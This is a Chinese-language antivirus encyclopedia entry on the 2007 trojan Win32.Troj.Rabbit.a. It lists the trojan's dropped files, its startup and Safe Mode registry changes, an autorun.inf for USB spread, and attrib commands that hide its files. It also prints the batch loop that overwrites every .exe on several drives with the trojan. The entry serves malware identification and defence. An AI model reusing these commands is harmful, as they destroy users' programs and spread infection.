該病毒是一個木馬。該病毒會直接替換c盤program files和其他盤的exe檔案。
基本介紹
- 外文名:Win32.Troj.Rabbit.a
- 病毒別名:N/A
- 處理時間:2007-04-09
- 威脅級別:★
- 病毒類型:木馬
- 影響系統:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行為,傳播途徑,
病毒行為
1、生成的檔案
%SystemRoot%\system32\JK.exe
%SystemRoot%\system32\loveRabbit.exe
%SystemRoot%\system32\Rabbit.exe
%SystemRoot%\system32\love.bat
%SystemRoot%\system32\msexch400.dll
%SystemRoot%\system32\loveRabbit.bat
%SystemRoot%\msconfig.inf
%SystemRoot%\msconfig1.inf
%C:%\Rabbit.exe
%C:%\AutoRun.inf
2、添加啟動項
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\
"StubPath" = "%SystemRoot%\system32\JK.exe..."
3、刪除下列註冊表信息
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
4、病毒作者留言
I LOVE Rabbit ,and you ? look:http://**/Rabbit.***
-----------------------------------------------
hello~
Welcome!
baidu黑客吧
-------------------------------------------
5、在c,d,e,f,g盤裡生成autorun啟動
------------------------------------
[autorun]
Label=本地磁碟
Shellexecute=Rabbit.exe
------------------------------------
6、將該病毒生成檔案設定為隱藏和系統屬性
attrib +s +h %SystemRoot%\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
7、該病毒會替換c盤program files和d,e,f,g盤中的exe檔案
---------------------------------------------------------------------
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>%SystemRoot%\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>%SystemRoot%\msconfig1.inf
FOR /f "delims=" %%i in (%SystemRoot%\msconfig.inf) do copy /y "%SystemRoot%\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (%SystemRoot%\msconfig1.inf) do copy /y "%SystemRoot%\system32\Rabbit.exe" "%%i"
傳播途徑
該病毒通過u盤傳播。
